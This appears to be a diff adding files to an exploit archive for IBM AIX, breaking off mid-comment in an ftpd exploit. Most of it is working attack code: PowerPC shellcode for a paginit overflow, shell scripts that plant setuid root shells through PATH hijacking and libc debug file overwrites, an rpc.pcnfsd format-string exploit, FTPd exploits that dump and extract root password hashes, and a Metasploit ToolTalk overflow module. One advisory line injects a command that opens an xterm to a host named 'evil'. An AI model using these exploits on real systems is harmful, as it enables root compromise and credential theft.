#define RETADDR 0x2ff22c90
char shellcode[] =
"\x7c\xa5\x2a\x79"
"\x40\x82\xff\xfd"
"\x7c\xa8\x02\xa6"
"\x38\xe0\x11\x11"
"\x39\x20\x48\x11"
"\x7c\xc7\x48\x10"
"\x38\x46\xc9\x05"
"\x39\x25\x11\x11"
"\x38\x69\xef\x17"
"\x38\x87\xee\xef"
"\x7c\xc9\x03\xa6"
"\x4e\x80\x04\x20"
"\x2f\x62\x69\x6e"
"\x2f\x73\x68\x00"
;
char envlabel[] = "X=";
void printint(char* buf, int x) {
buf[0] = x >> 24;
buf[1] = (x >> 16) & 0xff;
buf[2] = (x >> 8) & 0xff;
buf[3] = x & 0xff;
}
int main(int argc, char **argv) {
char *env[3];
char code[1000];
char buf[8000];
char *p, *i;
int offset1 = 0;
offset1 = 0; // atoi(argv[1]);
memset(code, 'C', sizeof(code));
memcpy(code, envlabel,sizeof(envlabel)-1);
// landingzone
for(i=code+sizeof(envlabel)+offset1; i<code+sizeof(code); i+=4)
printint(i, 0x7ca52a79);
memcpy(code+sizeof(code)-sizeof(shellcode), shellcode, sizeof(shellcode)-1);
code[sizeof(code)-1] = 0;
env[0] = code;
env[1] = 0;
memset(buf, 'A', sizeof(buf));
buf[sizeof(buf)-1] = 0;
p = buf;
p += 4114;
printint(p,RETADDR); // try to hit the landingzone
p += 72;
printint(p, RETADDR); // any readable address (apparently not overwritten)
execle("/usr/bin/paginit", "/usr/bin/paginit", buf, 0, env);
}
// milw0rm.com [2004-12-20]

13
platforms/aix/local/701.sh Executable file
View file

@ -0,0 +1,13 @@
mkdirhier /tmp/aap/bin
export DIAGNOSTICS=/tmp/aap
cat > /tmp/aap/bin/Dctrl << EOF
#!/bin/sh
cp /bin/sh /tmp/.shh
chown root:system /tmp/.shh
chmod u+s /tmp/.shh
EOF
chmod a+x /tmp/aap/bin/Dctrl
lsmcode
/tmp/.shh
# milw0rm.com [2004-12-21]

25
platforms/aix/local/898.sh Executable file
View file

@ -0,0 +1,25 @@
#!/usr/bin/sh
# r00t exploit written for the invscout bug reported by Idefense labs
# http://www.idefense.com/application/poi/display?id=171&type=vulnerabilities
# coded by ri0t exploitation is trivial but automated with this script
# www.ri0tnet.net
#
# usage ./getr00t.sh :)
# exploitation gives euid(root) from here getting guid (root) is as simple as an
# /etc/passwd edit
cd /tmp
echo '/usr/bin/cp /usr/bin/ksh ./' > uname
echo '/usr/bin/chown root:system ./ksh' >> uname
echo '/usr/bin/chmod 777 ./ksh' >> uname
echo '/usr/bin/chmod +s ./ksh' >> uname
/usr/bin/chmod 777 uname
PATH=./
export PATH
/usr/sbin/invscout
PATH="/usr/bin:/usr/sbin:/usr/local/bin:/bin:./"
export PATH
exec /tmp/ksh
# milw0rm.com [2005-03-25]

33
platforms/aix/local/9306.txt Executable file
View file

@ -0,0 +1,33 @@
#!/bin/bash
#################################################################
# _______ _________ _ #
# ( ____ )\__ __/( ( /| #
# | ( )| ) ( | \ ( | #
# | (____)| | | | \ | | #
# | __) | | | (\ \) | #
# | (\ ( | | | | \ | #
# | ) \ \__ | | | ) \ | #
# |/ \__/ )_( |/ )_) #
# http://root-the.net #
#################################################################
#[+] IBM AIX libc MALLOCDEBUG File Overwrite Vulnerability #
#[+] Refer : securitytracker.com/id?1022261 #
#[+] Exploit : Affix <root@root-the.net> #
#[+] Tested on : IBM AIX #
#[+] Greetz : Mad-Hatter, Atomiku, RTN, Terogen, SCD, Boxhead, #
# str0ke, tekto, SonicX, Android, tw0, d0nk, Redskull #
# AIX 5.3 ML 5 is where this bad libc code was added. #
# Libs Affected : #
# /usr/ccs/lib/libc.a #
# /usr/ccs/lib/libp/libc.a #
#################################################################
Set the following environment variables:
umask 000
MALLOCTYPE=debug
MALLOCDEBUG=report_allocations,output:/bin/filename
echo "Now run any setuid root binary.. /bin/filename will be created with 777 permissions."
# milw0rm.com [2009-07-30]

90
platforms/aix/local/9645.sh Executable file
View file

@ -0,0 +1,90 @@
#!/bin/sh
#
# $Id: raptor_libC,v 1.1 2009/09/10 15:08:04 raptor Exp $
#
# raptor_libC - AIX arbitrary file overwrite via libC debug
# Copyright (c) 2009 Marco Ivaldi <raptor@mediaservice.net>
#
# Property of @ Mediaservice.net Srl Data Security Division
# http://www.mediaservice.net/ http://lab.mediaservice.net/
#
# *** DON'T RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING ***
#
# A certain debugging component in IBM AIX 5.3 and 6.1 does not properly handle
# the (1) _LIB_INIT_DBG and (2) _LIB_INIT_DBG_FILE environment variables, which
# allows local users to gain privileges by leveraging a setuid-root program to
# create an arbitrary root-owned file with world-writable permissions, related
# to libC.a (aka the XL C++ runtime library) in AIX 5.3 and libc.a in AIX 6.1
# (CVE-2009-2669).
#
# Typical privilege escalation techniques via arbitrary file creation don't
# seem to work on recent AIX versions: .rhosts is ignored if it is group or
# world writable; LIBPATH and LDR_PRELOAD have no effect for setuid binaries;
# /var/spool/cron/atjobs seems useless as well, since we cannot open cron's
# named pipe /var/adm/cron/FIFO. Other viable exploitation vectors that come
# to mind, depending on the target box setup, are: /root/.ssh/authorized_keys,
# /root/{.profile,.kshrc}, and /etc/rc.d/rc2.d.
#
# See also: http://milw0rm.com/exploits/9306
#
# Usage:
# $ uname -a
# AIX rs6000 3 5 0052288E4C00
# $ lslpp -L xlC.rte | grep xlC.rte
# xlC.rte 9.0.0.1 C F XL C/C++ Runtime
# $ chmod +x raptor_libC
# $ ./raptor_libC /bin/bobobobobob
# [...]
# -rw-rw-rw- 1 root staff 63 Sep 10 09:55 /bin/bobobobobob
#
# Vulnerable platforms (AIX 5.3):
# xlC.rte < 8.0.0.0 [untested]
# xlC.rte 8.0.0.0-8.0.0.14 [untested]
# xlC.rte 9.0.0.0-9.0.0.9 [tested]
# xlC.rte 10.1.0.0-10.1.0.2 [untested]
#
# Vulnerable platforms (AIX 6.1):
# bos.rte.libc 6.1.0.0-6.1.0.11 [untested]
# bos.rte.libc 6.1.1.0-6.1.1.6 [untested]
# bos.rte.libc 6.1.2.0-6.1.2.5 [untested]
# bos.rte.libc 6.1.3.0-6.1.3.2 [untested]
# bos.adt.prof 6.1.0.0-6.1.0.10 [untested]
# bos.adt.prof 6.1.1.0-6.1.1.5 [untested]
# bos.adt.prof 6.1.2.0-6.1.2.4 [untested]
# bos.adt.prof 6.1.3.0-6.1.3.1 [untested]
#
echo "raptor_libC - AIX arbitrary file overwrite via libC debug"
echo "Copyright (c) 2009 Marco Ivaldi <raptor@mediaservice.net>"
echo
# check the arguments
if [ -z "$1" ]; then
echo "*** DON'T RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING ***"
echo
echo "Usage: $0 <filename>"
echo
exit
fi
# prepare the environment
_LIB_INIT_DBG=1
_LIB_INIT_DBG_FILE=$1
export _LIB_INIT_DBG _LIB_INIT_DBG_FILE
# gimme -rw-rw-rw-!
umask 0
# setuid program linked to /usr/lib/libC.a
/usr/dt/bin/dtappgather
# other good setuid targets
# /usr/dt/bin/dtprintinfo
# /opt/IBMinvscout/bin/invscoutClient_VPD_Survey
# check the created file
ls -l $_LIB_INIT_DBG_FILE
echo
# milw0rm.com [2009-09-11]

116
platforms/aix/remote/14407.c Executable file
View file

@ -0,0 +1,116 @@
/*************************************************************************
* Check Point Software Technologies - Vulnerability Discovery Team (VDT) *
* Rodrigo Rubira Branco - <rbranco *noSPAM* checkpoint.com> *
* *
* rpc.pcnfsd syslog format string vulnerability *
*************************************************************************/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <rpc/rpc.h>
#define PCNFSD_PROG 150001
#define PCNFSD_VERS 1
#define PCNFSD_PR_INIT 2
#define PCNFSD_PR_START 3
struct cm_send {
char *s1;
char *s2;
};
struct cm_send2 {
char *s1;
char *s2;
};
struct cm_reply {
int i;
};
bool_t xdr_cm_send(XDR *xdrs, struct cm_send *objp)
{
if(!xdr_wrapstring(xdrs, &objp->s1))
return (FALSE);
if(!xdr_wrapstring(xdrs, &objp->s2))
return (FALSE);
return (TRUE);
}
bool_t xdr_cm_send2(XDR *xdrs, struct cm_send2 *objp)
{
if(!xdr_wrapstring(xdrs, &objp->s1))
return (FALSE);
if(!xdr_wrapstring(xdrs, &objp->s2))
return (FALSE);
return (TRUE);
}
bool_t xdr_cm_reply(XDR *xdrs, struct cm_reply *objp)
{
if(!xdr_int(xdrs, &objp->i))
return (FALSE);
return (TRUE);
}
int
main(int argc, char *argv[])
{
long ret, offset;
int len, x, y, i;
char *hostname, *b;
CLIENT *cl;
struct cm_send send;
struct cm_send2 send2;
struct cm_reply reply;
struct timeval tm = { 10, 0 };
enum clnt_stat stat;
printf("-= rpc.pcnfsd remote format string exploit, tested against AIX 6.1.0 and lower =-\n");
printf("-= Check Point Software Technologies - Vulnerability Discovery Team (VDT) =-\n");
printf("-= Rodrigo Rubira Branco <rbranco *noSPAM* checkpoint.com> =-\n\n");
if(argc < 2) {
printf("Usage: %s [hostname]\n", argv[0]);
exit(1);
}
hostname = argv[1];
send.s1 = "AAAA%n%n%n%n%n%n%n%n%n"; // Create the dir on /var/spool/pcnfs
send.s2 = "";
send2.s1 = "AAAA%n%n%n%n%n%n%n%n%n";// Call the dir to trigger fmt bug
send2.s2 = "";
printf("\nSending PCNFSD_PR_INIT to the server ... ");
if(!(cl=clnt_create(hostname,PCNFSD_PROG,PCNFSD_VERS,"udp"))){
clnt_pcreateerror("\nerror");exit(-1);
}
stat=clnt_call(cl, PCNFSD_PR_INIT, xdr_cm_send, (caddr_t) &send,
xdr_cm_reply, (caddr_t) &reply, tm);
clnt_destroy(cl);
printf("done!\n");
printf("Sending PCNFSD_PR_START procedure ... ");
if(!(cl=clnt_create(hostname,PCNFSD_PROG,PCNFSD_VERS,"udp"))){
clnt_pcreateerror("\nerror");exit(-1);
}
cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL);
stat=clnt_call(cl, PCNFSD_PR_START, xdr_cm_send2, (caddr_t) &send2,
xdr_cm_reply, (caddr_t) &reply, tm);
printf("done!\n");
clnt_destroy(cl);
}

96
platforms/aix/remote/14409.pl Executable file
View file

@ -0,0 +1,96 @@
### AIXCOREDUMP.PL ---
### --== ~ AIX5l w/ FTP-SERVER REMOTE ROOT HASH DISCLOSURE EXPLOIT ~ =--
### CREATES COREDUMP INCLUDING THE ROOT USER HASH FROM /etc/security/passwd
### THE RESULT FILE IS SCRAMBLED - SEEK FOR DES LOOKING CRYPTO KEYS
### SUCCESSFULLY TESTED ON IBM AIX 5.1
### DISCOVERED & EXPLOITED BY KINGCOPE
### JULY 2010
use IO::Socket;
$|=1;
print "--== ~ AIX5l w/ FTP-SERVER REMOTE ROOT HASH DISCLOSURE EXPLOIT ~ =--\n";
print "CREATES COREDUMP INCLUDING THE ROOT USER HASH FROM /etc/security/passwd\n";
print "BY KINGCOPE\n";
print "JULY 2010\n\n";
if ($#ARGV < 1) {
print "USAGE: ./AIXCOREDUMP.PL <target address> <your ip> [username] [password]\n";
print "SAMPLES:\n";
print "YOU HAVE A LOGIN ./AIXCOREDUMP.PL 192.168.1.150 192.168.1.25 kcope passwd\n";
print "USE GUEST ACCOUNT - NEEDS WRITE ACCESS IN /PUB ./AIXCOREDUMP.PL 192.168.1.150 192.168.1.25\n";
exit;
}
$trgt = $ARGV[0];
$sock = IO::Socket::INET->new(PeerAddr => $trgt,
PeerPort => '21',
Proto => 'tcp');
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/\./,/gi;
if ($ARGV[2] eq "") {
$user = "ftp";
$pass = "c0deb4b3\@roothash.com";
} else {
$user = $ARGV[2];
$passwd = $ARGV[3];
}
$x = <$sock>;
print "*AIX EXPLOIT* REMOTE FTPD: $x\n";
if (fork()) {
for ($k=0;$k<3;$k++) {
print "*AIX EXPLOIT* POLLUTING FTPD***\n";
print "\t$x";
print $sock "USER root\r\n";
$x = <$sock>;
print "\t$x";
print $sock "PASS sexy\r\n";
$x = <$sock>;
print "\t$x";
}
print "*AIX EXPLOIT* ACCESSING FOLDER***\n";
print $sock "USER $user\r\n";
$x = <$sock>;
print "\t$x";
print $sock "PASS $passwd\r\n";
$x = <$sock>;
print "\t$x";
if ($ARGV[2] eq "") {
print "*AIX EXPLOIT* CWD TO PUB***\n";
print $sock "CWD pub\r\n";
$x = <$sock>;
print "\t$x";
}
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
$x = <$sock>;
print "\t$x";
print "*AIX EXPLOIT* TRIGGERING COREDUMP***\n";
print $sock "NLST ~" . "A" x 5000 . "\r\n";
$x = <$sock>;
while(<$sock>) {
print;
}
print "*AIX EXPLOIT* (SUCCESS)***\n*AIX EXPLOIT* NOW RETRIEVE THE core FILE WITH YOUR FAVOURITE CLIENT AND LOOKUP THE R00T HASH++CRACKIT!***\n";
exit;
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
die "Could not create socket: $!\n" unless $servsock;
my $new_sock = $servsock->accept();
while(<$new_sock>) {
print $_;
}
close($servsock);
}
## CHEERIO!

328
platforms/aix/remote/14456.c Executable file
View file

@ -0,0 +1,328 @@
/*
* IBM AIX 5l FTPd Remote DES Hash Exploit -- Advanced 'Datacenter' Edition :>
*
* Should work on IBM AIX 5.1,5.2,5.3! probably on 4.X too
*
* bug found & exploited by Kingcope
*
* Version 2.0 - July 2010
* ----------------------------------------------------------------------------
* Description: -
* The AIX 5l FTP-Server crashes when an overly long NLST command is supplied -
* For example: NLST ~AAAAA...A (2000 A´s should be enough) -
* The fun part here is that it creates a coredump file in the current -
* directory if it is set writable by the logged in user. -
* The goal of the exploit is to get the DES encrypted user hashes -
* off the server. These can be later cracked with JtR. -
* This is accomplished by populating the memory with logins of the user -
* we would like the encrypted hash from. Logging in three times with the -
* target username should be enough so that the DES hash is included in the -
* 'core' file. -
* The FTPd banner looks like below. -
* 220 AIX5l FTP-Server (Version 4.1 Tue May 29 11:57:21 CDT 2001) ready. -
* 220 AIX5l FTP server (Version 4.1 Wed Mar 2 15:52:50 CST 2005) ready. -
* ----------------------------------------------------------------------------
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <fcntl.h>
int createconnection(char *target, char *targetport);
void getline(int s);
void putline(int s, char *out);
void usage(char *exe);
char in[8096];
char out[8096];
int main(int argc, char *argv[])
{
extern int optind;
extern char *optarg;
int haveuser=0,havepassword=0;
int s,s2,nsock;
int c,k,len;
int fd;
char *target = NULL;
char *username = "ftp";
char *password = "guest";
char *writeto = "pub";
char *crackme = "root";
char *targetport = "21";
int uselist = 0;
char *myip = NULL;
char *as = NULL;
int octet_in[4], port;
struct sockaddr_in yo, cli;
char *oct = NULL;
while ((c = getopt(argc, argv, "h:i:p:l:k:d:c:s")) != EOF) {
switch(c) {
case 'h':
target = (char*)malloc(strlen(optarg)+1);
strcpy(target, optarg);
break;
case 'i':
myip = (char*)malloc(strlen(optarg)+1);
strcpy(myip, optarg);
break;
case 'p':
targetport = (char*)malloc(strlen(optarg)+1);
strcpy(targetport, optarg);
break;
case 'l':
username = (char*)malloc(strlen(optarg)+1);
strcpy(username, optarg);
haveuser = 1;
break;
case 'k':
password = (char*)malloc(strlen(optarg)+1);
strcpy(password, optarg);
havepassword = 1;
break;
case 'd':
writeto = (char*)malloc(strlen(optarg)+1);
strcpy(writeto, optarg);
break;
case 'c':
crackme = (char*)malloc(strlen(optarg)+1);
strcpy(crackme, optarg);
break;
case 's':
uselist = 1;
break;
default:
usage(argv[0]);
}
}
if (target == NULL || myip == NULL)
usage(argv[0]);
if ((haveuser && !havepassword) || (!haveuser && havepassword)) {
usage(argv[0]);
}
s = createconnection(target, targetport);
getline(s);
fprintf(stderr, "populating DES hash in memory...\n");
for (k=0;k<3;k++) {
snprintf(out, sizeof out, "USER %s\r\n", crackme);
putline(s, out);
getline(s);
snprintf(out, sizeof out, "PASS abcdef\r\n");
putline(s,out);
getline(s);
}
fprintf(stderr, "logging in...\n");
snprintf(out, sizeof out, "USER %s\r\n", username);
putline(s, out);
getline(s);
snprintf(out, sizeof out, "PASS %s\r\n", password);
putline(s,out);
getline(s);
getline(s);
fprintf(stderr, "changing directory...\n");
snprintf(out, sizeof out, "CWD %s\r\n", writeto);
putline(s, out);
getline(s);
fprintf(stderr, "triggering segmentation violation...\n");
as = (char*)malloc(2000);
memset(as, 'A', 2000);
as[2000-1]=0;
if (!uselist) {
snprintf(out, sizeof out, "NLST ~%s\r\n", as);
} else {
/* AIX 5.3 trigger - thanks to karol */
snprintf(out, sizeof out, "LIST ~%s\r\n", as);
}
putline(s, out);
memset(in, '\0', sizeof in);
if (recv(s, in, sizeof in, 0) < 1) {
printf("trigger succeeded!\nwaiting for core file to be created...\n");
} else {
printf("trigger seems to have failed, proceeding anyways...\n"
"\nwaiting for core file to be created...\n");
}
sleep(5);
close(s);
s = createconnection(target, targetport);
getline(s);
fprintf(stderr, "logging in 2nd time...\n");
snprintf(out, sizeof out, "USER %s\r\n", username);
putline(s, out);
getline(s);
snprintf(out, sizeof out, "PASS %s\r\n", password);
putline(s,out);
getline(s);
getline(s);
fprintf(stderr, "changing directory...\n");
snprintf(out, sizeof out, "CWD %s\r\n", writeto);
putline(s, out);
getline(s);
fprintf(stderr, "getting core file...\n");
snprintf(out, sizeof out, "TYPE I\r\n");
putline(s, out);
getline(s);
port = getpid() + 1024;
len = sizeof(cli);
bzero(&yo, sizeof(yo));
yo.sin_family = AF_INET;
yo.sin_port=htons(port);
yo.sin_addr.s_addr = htonl(INADDR_ANY);
oct=(char *)strtok(myip,".");
octet_in[0]=atoi(oct);
oct=(char *)strtok(NULL,".");
octet_in[1]=atoi(oct);
oct=(char *)strtok(NULL,".");
octet_in[2]=atoi(oct);
oct=(char *)strtok(NULL,".");
octet_in[3]=atoi(oct);
snprintf(out, sizeof out, "PORT %d,%d,%d,%d,%d,%d\r\n", octet_in[0], octet_in[1], octet_in[2], octet_in[3], port / 256, port % 256);
putline(s, out);
getline(s);
if ((s2=socket(AF_INET, SOCK_STREAM, 0)) < 0) {
perror("socket");
return -1;
}
if ((bind(s2, (struct sockaddr *) &yo, sizeof(yo))) < 0) {
perror("bind");
close(s2);
exit(1);
}
if (listen(s2, 10) < 0) {
perror("listen");
close(s2);
exit(1);
}
snprintf(out, sizeof out, "RETR core\r\n");
putline(s, out);
getline(s);
if (strstr(in, "150") == NULL) {
fprintf(stderr, "core file not found... terminating.\n");
close(s);
exit(1);
}
fd = open("core", O_WRONLY | O_CREAT);
if (fd == -1) {
perror("open on local core file");
close(s);
exit(1);
}
sleep(1);
if ((nsock = accept(s2, (struct sockaddr *)&cli, &len)) < 0) {
perror("accept");
close(s);
exit(1);
}
do {
k = recv(nsock, in, sizeof in, 0);
if (k < 1) break;
write(fd, in, k);
} while (k > 0);
close(nsock);
close(fd);
close(s);
fprintf(stderr, "finally extracting DES hashes from core file for user '%s'...\n", crackme);
system("strings core | grep '^[A-Za-z0-9]\\{13\\}$'");
fprintf(stderr, "done.\n");
return 0;
}
int createconnection(char *target, char *targetport) {
struct addrinfo hints, *res;
int s;
memset(&hints, 0, sizeof hints);
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
if (getaddrinfo(target, targetport, &hints, &res)) {
perror("getaddrinfo");
exit(1);
}
s = socket(res->ai_family, res->ai_socktype, res->ai_protocol);
if (s < 0) {
perror("socket");
exit(1);
}
if (connect(s, res->ai_addr, res->ai_addrlen) < 0) {
perror("connect");
exit(1);
}
return s;
}
void getline(int s)
{
memset(in, '\0', sizeof in);
if (recv(s, in, sizeof in, 0) < 1) {
perror("recv");
close(s);
exit(1);
}
fprintf(stderr, "<\t%s", in);
}
void putline(int s, char *out) {
fprintf(stderr, ">\t%s", out);
if (send(s, out, strlen(out), 0) == -1) {
perror("send");
close(s);
exit(1);
}
}
void usage(char *exe)
{
fprintf(stderr, "%s <-h host> <-i your internal ip> [-p port] [-l username] [-k password]"
" [-d writable directory] [-c user to crack] [-s use 'LIST' command on AIX 5.3]\n",
exe);
exit(0);
}

289
platforms/aix/remote/16930.rb Executable file
View file

@ -0,0 +1,289 @@
##
# $Id: rpc_ttdbserverd_realpath.rb 10998 2010-11-11 22:43:22Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::SunRPC
include Msf::Exploit::Brute
def initialize(info = {})
super(update_info(info,
'Name' => 'ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)',
'Description' => %q{
This module exploits a buffer overflow vulnerability in _tt_internal_realpath
function of the ToolTalk database server (rpc.ttdbserverd).
},
'Author' =>
[
'Adriano Lima <adriano@risesecurity.org>',
'ramon'
],
'Version' => '$Revision: 10998 $',
'Platform' => [ 'aix' ],
'References' =>
[
[ 'CVE', '2009-2727'],
[ 'OSVDB', '55151' ]
],
'Payload' =>
{
'BadChars' => "\x00",
},
'Targets' =>
[
[
'IBM AIX Version 6.1.4',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20099430+4096,
'Addr1' => 0x2ff1ff50-8192,
'AIX' => '6.1.4',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20099430-8192 },
'Stop' => { 'Ret' => 0x20099430+8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 6.1.3',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20099280+4096,
'Addr1' => 0x2ff1ffd0-8192,
'AIX' => '6.1.3',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20099280-8192 },
'Stop' => { 'Ret' => 0x20099280+8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 6.1.2',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20099280+4096,
'Addr1' => 0x2ff1ffd0-8192,
'AIX' => '6.1.2',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20099280-8192 },
'Stop' => { 'Ret' => 0x20099280+8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 6.1.1',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20099280+4096,
'Addr1' => 0x2ff1ffd0-8192,
'AIX' => '6.1.1',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20099280-8192 },
'Stop' => { 'Ret' => 0x20099280+8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 6.1.0',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20099280+4096,
'Addr1' => 0x2ff1ffd0-8192,
'AIX' => '6.1.0',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20099280-8192 },
'Stop' => { 'Ret' => 0x20099280+8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 5.3.10 5.3.9 5.3.8 5.3.7',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20096ba0+4096,
'Addr1' => 0x2ff1ff14-8192,
'AIX' => '5.3.9',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20096ba0-8192 },
'Stop' => { 'Ret' => 0x20096ba0+8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 5.3.10',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20096bf0+4096,
'Addr1' => 0x2ff1ff14-8192,
'AIX' => '5.3.10',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20096bf0-8192 },
'Stop' => { 'Ret' => 0x20096bf0+8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 5.3.9',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20096ba0+4096,
'Addr1' => 0x2ff1ff14-8192,
'AIX' => '5.3.9',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20096ba0-8192 },
'Stop' => { 'Ret' => 0x20096ba0+8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 5.3.8',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20096c10+4096,
'Addr1' => 0x2ff1ff98-8192,
'AIX' => '5.3.8',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20096c10-8192 },
'Stop' => { 'Ret' => 0x20096c10+8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 5.3.7',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20096c10+4096,
'Addr1' => 0x2ff1ff98-8192,
'AIX' => '5.3.7',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20096c10-8192 },
'Stop' => { 'Ret' => 0x20096c10+8192 },
'Step' => 1024
}
}
],
[
'Debug IBM AIX Version 6.1',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0xaabbccdd,
'Addr1' => 0xddccbbaa,
'AIX' => '6.1.4',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0xaabbccdd },
'Stop' => { 'Ret' => 0xaabbccdd },
'Step' => 1024
}
}
],
[
'Debug IBM AIX Version 5.3',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0xaabbccdd,
'Addr1' => 0xddccbbaa,
'AIX' => '5.3.10',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0xaabbccdd },
'Stop' => { 'Ret' => 0xaabbccdd },
'Step' => 1024
}
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 17 2009'))
end
def brute_exploit(brute_target)
if not @aixpayload
datastore['AIX'] = target['AIX']
@aixpayload = regenerate_payload.encoded
end
print_status("Trying to exploit rpc.ttdbserverd with address 0x%08x..." % brute_target['Ret'])
begin
sunrpc_create('tcp', 100083, 1)
if target['AIX'] =~ /6\./
buf = "A"
else
buf = "AA"
end
buf << [target['Addr1']].pack('N') * (1022 + 8)
buf << [brute_target['Ret']].pack('N') * 32
if target['AIX'] =~ /6\./
buf << "AAA"
else
buf << "AA"
end
buf << "\x7f\xff\xfb\x78" * 1920
buf << @aixpayload
buf = XDR.encode(buf, 2, 0x78000000, 2, 0x78000000)
print_status('Sending procedure 15 call message...')
sunrpc_call(15, buf)
sunrpc_destroy
handler
rescue Rex::Proto::SunRPC::RPCTimeout
# print_error('RPCTimeout')
rescue EOFError
# print_error('EOFError')
end
end
end

16
platforms/aix/remote/19047 Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/62/info
There exists a buffer overflow in the Stalker Internet Mail Server version 1.6. If you connect to the SMTP port and issue a HELO command with a large string (several hundred bytes) for a hostname the server, and possibly MacOS, will crash.
220-Stalker Internet Mail Server V.1.6 is ready.
220 ESMTP is spoken here.
HELO
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxx
[dead]

5
platforms/aix/remote/19048 Executable file
View file

@ -0,0 +1,5 @@
source: http://www.securityfocus.com/bid/64/info
There exists a security vulnerability with the CGI program pfdispaly.cgi distributed with IRIX. This problem its not fixed by patch 3018.
$ lynx -dump http://victim/cgi-bin/pfdisplay.cgi?'%0A/usr/bin/X11/xterm%20-display%20evil:0.0|'

7
platforms/aix/remote/19237 Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/297/info
NTMail v3.X is susceptible to being used as a mail relay for SPAM or other unsolicited email. Connecting to the mail server (tcp25) and issuing a 'mail from' command with <> as the data will allow an unathorized user to relay email via this server.
Gordano's own JUCE product (to prevent mail relay attacks and other SPAM activity) will not prevent NTMAIL v.3.x from being used as a mail relay.
Specify <> in the 'Mail From' field.

5
platforms/aix/remote/19348 Executable file
View file

@ -0,0 +1,5 @@
source: http://www.securityfocus.com/bid/458/info
A problem with the way login parses arguments as passed by rlogind that may allow access to the root account.
%rlogin -froot targethost.com

159
platforms/aix/remote/19532.pl Executable file
View file

@ -0,0 +1,159 @@
source: http://www.securityfocus.com/bid/679/info
A remote buffer overflow vulnerability in AIX's ftpd allows remote users to obtain root access.
#!/usr/bin/perl
# *** Synnergy Networks
# * Description:
#
# Remote bufferoverflow exploit for ftpd from AIX 4.3.2 running on an
# RS6000. (power)
# This is an return into libc exploit specificly crafted for
# one box and it is very unlikely to work on another box
# * Author:
#
# dvorak (dvorak@synnergy.net)
# Synnergy Networks (c) 1999, http://www.synnergy.net
# * Greets:
#
# Synnergy Networks, Hit2000 crew, Emphyrio, shevek
# * Comments:
#
# A full working exploit will be released later on.
# The addresses point to positions in the program or libraries,
